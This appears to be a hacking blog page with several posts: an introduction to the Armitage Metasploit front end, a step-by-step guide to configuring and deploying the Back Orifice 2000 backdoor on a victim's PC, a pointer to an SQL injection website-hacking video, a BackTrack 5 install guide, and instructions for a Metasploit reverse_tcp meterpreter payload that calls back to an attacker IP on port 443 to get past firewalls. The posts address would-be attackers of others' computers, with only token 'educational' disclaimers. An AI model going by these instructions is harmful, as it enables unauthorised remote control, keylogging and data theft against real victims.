Armitage : Graphical Cyber Attack Management Tool

Tweet

Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets, recommends exploits, and exposes the advanced capabilities of the framework. Armitage aims to make Metasploit usable for security practitioners who understand hacking but don’t use Metasploit every day. If you want to learn Metasploit and grow into the advanced features, Armitage can help you.

Armitage organizes Metasploit’s capabilities around the hacking process. There are features for discovery, access, post-exploitation, and maneuver.

For discovery, Armitage exposes several of Metasploit’s host management features. You can import hosts and launch scans to populate a database of targets. Armitage also visualizes the database of targets–you’ll always know which hosts you’re working with and where you have sessions.

Armitage assists with remote exploitation–providing features to automatically recommend exploits and even run active checks so you know which exploits will work. If these options fail, you can use the Hail Mary approach and unleash db_autopwn against your target database.

Requirements

• To use Armitage, you need the following:
• Linux or Windows
• Java 1.6+
• Metasploit Framework 3.5+
• A configured database. Make sure you know the username, password, and host.

Download

• Windows
• Linux

Read More

What is Backdoor ? How to use Backdoor

Tweet

Using backdoor, hackers can remotely access your computer without any Authentication and do whatever the hacker wants. I will tell you some of the features rest of them you need to try it and find out. These Programs :

• Work as a key logger.
• Send any Information from Victim’s PC to the Hacker’s PC.
• Run any program on the Victims PC.
• Display any Violating Image on victim’s Screen.
• Open the CD Drive of the Victim’s PC.
• Open any Web page on the Victims Screen.
• Disable any Specific Key or whole Keyboard.
• Shutdown Victim’s PC.
• Start a Song on the Victim’s PC.etc.etc…………..

The best backtrack I found is Back Orifice so I am going to discuss it.

Back Orifice

Back Orifice is one of the most common backdoor programs, and one of the most deadly. The name may seem like a joke, but sure, the threat is real. Back Orifice was established in Cult of the Dead Cow group. Back Orifice is an Open Source Program. The main Threat of this software is that by making some changes in the code anybody can make it undetectable to the Anti virus Program running on the Victim’s computer. Apart from the strange title, the program usually gets port 31337, the reference to “Lit” phenomenon is popular among hackers.

• Basics Back Orifice consist of 2 main parts. The "client" and the "server". 
• The client is the part of Bo2k that you use to control the other party's comp. By defult, it's bo2kgui.exe 
• The server is the file you install in the other party's comp in order to control it. By defult, it's bo2k.exe. 
• Never ever run bo2k.exe on your own comp unless you know what you are doing. 
• Another ipmortant component is plugins. To put it simply, Plugins are addon for Bo2k. They enhance the power of Bo2k.
• For a list of plugins for Bo2k, goto the Bo2k official Site. 
• In order to control the other party's comp, you must first sent the bo2k sever to the other party, and once the other party runs it, you just start your bo2k client and using it you can assert your control. 

How to use Back Orifice ?

How to use it? First you must configure both the client and the server. First let's configure the server.

• Download a copy of Bo2k and unzip it. 
• Then run the file bo2kcfg.exe. 
• A window will appear welcoming you to the bo2k configuration wizard.
• Click on next (For those experts, they don't use the wizard, they configure it manually.But one thing at a time first.) 
• Then the wizard will ask you for the bo2k server file(that's bo2k.exe). 
• By defult you just need to click next. However if you rename it or kept it in another folder, go browse for it. 
• Now it will ask you if you want TCPIO connection or UDPIO Connection. I would recommand TCPIO. 
• Now they will ask you what port you want it to listen to. More popular ones are 6666, 54321, 33137, 31336 and 4444. Try to advoid these. Try putting a number that you can remember easily. Avoid 12345, 1080, 8808. 
• Now they will ask you for your encryption type. Usually you get only to choose the XOR option. Do not choose 3DES if you are not in US. 
• Now they will ask you what password you want to use.Choose one and remember it. 
• Then click finished. The wizard will auto config the Client part for you. Be patient you can use it soon.
• Now sent the server part(bo2k.exe ) to the other party and when the other party runs it, you will be able to connect to it. 

What to do when victim clicks on server ?

• Start bo2kgui.exe. 
• Click on file, then new server. 
• Type what ever name you want to call it. 
• Now type the ip address of the other party. If you don't know it,then you are out of luck. 
• If the other party is on irc, just goto irc and type /dns and you will get the ip (plz dun include the <> when typing /dns). 
• Now click on connect. You should see a window saying "Retriving server capability. Please wait.."
• However if you see "Cannot connect to Remote server" that means the other party either did not run the Bo2k.exe or he is behind a firewall or maybe he has gone offline. Then you are out of luck. :) 
• One you have connnect, on the right window you should see some folders. I will explain the functions inside the folder in the next post .

Download Back Orifice 2000

• Back Orifice 2000 can be downloaded at the following address: http://sourceforge.net/projects/bo2k/

How do I delete Back orifice 2000

Removing Back Orifice 2000 may require that you change the registry settings. To remove it at 7 simple steps, refer to the diagram below.

• Click Start> Run, and type “Regedit”(without the quotes)
• Follow the path below: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices “
• Now looking in the right box: “The umgr32 = ‘c: \ windows \ system \ umgr32.exe”
• Right-click on this entry and click Remove. Now restart your computer.
• After restarting only open Windows Explorer. Make sure you can see all registered extensions. To do so, select “View Options and configure the appropriate settings.
• Go to the WINDOWS \ SYSTEM directory, and find “umgr32.exe” file. Once you find it, delete it.
• Exit Windows Explorer and reboot again. 

NOTE : Only for educational purposes and If I got good response on it ,I will furthur explain the functions of folder and also how to add plugins in it.So give your comments if you like it !!!

Read More

Hack website completely using SQL Injection - Video Tutorial

Tweet

I have posted a complete  tutorial about How to Hack Websites using SQL Injection . But man guys are having problem using SQL so here's a video tutorial in which I have hacked a website completely using SQL Injection. Just follow this simple steps and hack that site . If having any problem then ask in the comments. Make sure to write the code as it is,particularly take much care of spaces as they are really confusing where we have to add space and where we dont need to add space.

Hack website completely using SQL Injection - Part 1

• First part of Video Tutroial :

Hack website completely using SQL Injection - Part 2

• Second part of Video Tutroial :

NOTE : This tutorial is only for educational purposes and the team of HWS is not responsible in any way for how this information is used, use it at your own risk.

Read More

How to Install BACKTRACK 5 and Manually Specify Partitions Using It

Tweet

Hello guys ... how are ya ??? wat ??? i didnt hear you !!! .. sorry i cant get u .. comment below ...:D
U must have heard a name BACKTRACK , ( who m i kidding :P ). Anyway i was discussing with xeo to make a thread on backtrack ... he said it wud be awesome . I have been using backtrack 5 for a while and thought i should share with you guys...
well i am a learner so feel free to correct my mistakes :)
M not gonna say wat is backtrack :P ... in this post i'll show u a way to install backtrack 5 r1 on your pc , more on backtrack in later posts...

Download Backtrack 5 r1

• First of all download backtrack 5 r1 .
• Select specification according to your pc , and i am using gnome flavor so i wud recommend you that only cause i find it less complicated . select ISO or VMWARE .
• ISO : If you want to make a dvd (plz plz do this) .
• VMWARE : if you want to run it on vmware ( :-( ) .

>> select torrent , it wud be easy ...
anyway you know how to download a file :P .

Make a DVD

I will highly recommend you to make a DVD for it cause for hacking backtrack is great and you'll need it in future also . Suppose backtrack crashes .. then wat will you do ?? so make a DVD
burn it in 3x otherwise it wont work

Installing Backtrack 

After you made DVD , boot your PC with it and follow these steps:

• Boot the live cd and select the first option as in the picture above
• then a command line or shell will start
• login with root as login id and toor as password . Ya toor is the default password :P
• then to start GUI type startx and hit enter.

Now you must be in a GUI with a install.sh or something like that file in desktop, Run that.
It will start the installation procedure.
You must be asked to specify partition for installation . There are three way to do it

1. By using entire disk : this will format your whole hard disk and install backtrack
2. Automatically side by side : this option will create partitions automatically and will install backtrack along with other OS present in your system.
3. Advanced : in this u have to it , this is a little tricky follow these steps below.

Manually Specifying Partitions

Follow these Steps :

• Select Manual as the partition method.
• In next window select any drive with free space
• With the free space line selected, click on the Add button. 
• In the new window, type memory of you RAM in the New partition size in megabytes field and select the swap area option from the Use as: drop down list. 
• Click the OK button and, in a few seconds, you'll notice a "swap" line with the specified size.
• With the "free space" line selected, click on the "Add" button. In the new window, select the "Primary" option, type a value between 10,000 and 50,000 (the memory u want backtrack to use) in the "New partition size in megabytes" field and select / as the "Mount point." 
• Click the OK button and, in a few seconds, you'll notice an ext4 / line with the specified size.
• With the "free space" line selected, click on the "Add" button. In the new window, select mount option as boot and allocate it a 150 mb or so memory. 
• Now click the forward button to install it.

DONE

Now you must have doubts , feel free to ask.
I'll continue this only if u show interest , i have some really cool stuffs on backtrack. so plz comment on the post. A comment from you too is required xeo .

HOPE THIS WAS INFORMATIVE FOR YOU , THANK YOU.
Copyright © 2011. All rights reserved by “Kumar Sourav" and "xeo hacker"

Read More

How to do Hacking the WAN Internet Using Metasploit

Tweet

A few days ago there's someone put a message on my contact in this website, he asking about "is it possible to do hacking outside LAN(Local Area Network)?". When you see all of my articles, 80% of all hacking articles were written for Local Area Network, because I'm doing in my own lab, "so how about hacking outside Local Area Network?". Of course it has the same logic like when you attacking from Local Area Network .

Requirement

• Virtual Private Server. For Backtrack 5 already installed VPS, you can view here (but you also can install yourself)


• Dedicated Server


• Cloud Server(I haven't try this ) e.g : Amazon


• Internet With Public IP


• You can control router by yourself

Step-By-Step

• Okay let's start from Virtual Private Server(VPS). This server can give you freedom to install any software you want on virtualization, because this hosting type give you flexibility to manage your server yourself (DIY)


• Dedicated Server almost doing the same like VPS(Virtual Private Server), but usually you have your own machine and then you put your machine on data center(or the service provider rent you their machine). This hosting type also allow you as user to manage your system yourself. You can do anything to your server and install anything you want to your server.


• Cloud server –> I haven't trying this…maybe someone can share


• You have internet with public IP address… usually when you subscribe 1:1 internet bandwidth, they also give you 1 public IP.


• Control router by ourselves to redirect incoming connection or outgoing connection.
  Before we continue to next step, let's see the figure below(I will try to figure it out in simple way) .


• Legends(Attacker) :
  - Attacker1 use local IP address –> 192.168.8.8
  - Attacker1 have public IP address –> 73.67.123.85
  - Attacker1 can control his router to redirect any incoming/outgoing traffic.
  - Attacker2 use VPS/Dedicated/Cloud server to do an attack that connected directly to internet.


• Legends(Victim) :
  - Victim1 have local IP address –> 192.168.1.2
  - Victim2 connected to internet via router+firewall, this firewall only allowing port 80 and 443 for outgoing connection
  - Victim2 connected directly to internet with IP address –> 98.87.112.89

How to Attack?

• Actually the network topology I draw above it's almost the same method to attack, you should know what is typical rules when administrator setting up a firewall(in this case is the network administrator who administer router for victim1).


• AFAIK they usually open specific port like :


• TCP 80(Hyper Text Transfer Protocol – HTTP) –> For browsing and surfing the website


• TCP 443(Secure Socket Layer – SSL) –> Secure HTTP connection or usually called HTTPS
  etc(you can scan it first but be careful).


• From the information above, usually attacker can create some payload and options like this :set payload windows/meterpreter/reverse_tcp
  set lhost 73.67.123.85
  set lport 443


• When the attack successfully launch, the payload will try to connect to IP address 73.67.123.85 with port 443. Attacker use port 443 because he know that victim1 firewall only allow port 80 and 443 for outgoing connection. If you configure the payload by using another port, the victim1 firewall will drop all unintended packet who will go through another port except 80 and 443. For the next step, attacker should configure his router to redirect all incoming traffic to port 443 to his local IP address 192.168.8.8.


• You can see the tutorial about example port forwarding WRT54G router here. Actually all router will have the same option for port forwarding


• Oops…I almost forget to explain how to do that from VPS/Dedicated/Cloud….
  Actually from VPS/Dedicated/Cloud it will be more easier and also safer(maybe..LoL), because there's a lot of hacker use this service…they buy using fake ID(hit and run) and then perform an attack from its server. The logic is almost the same with I've already explained above.


• You should remember that every action triggering some consequences even it's good or bad. When you doing something you should know every consequences you will get later when doing the action. Be wise .

Hope it's useful for you.
If information I wrote here was wrong, let me know I'll correct it

Read More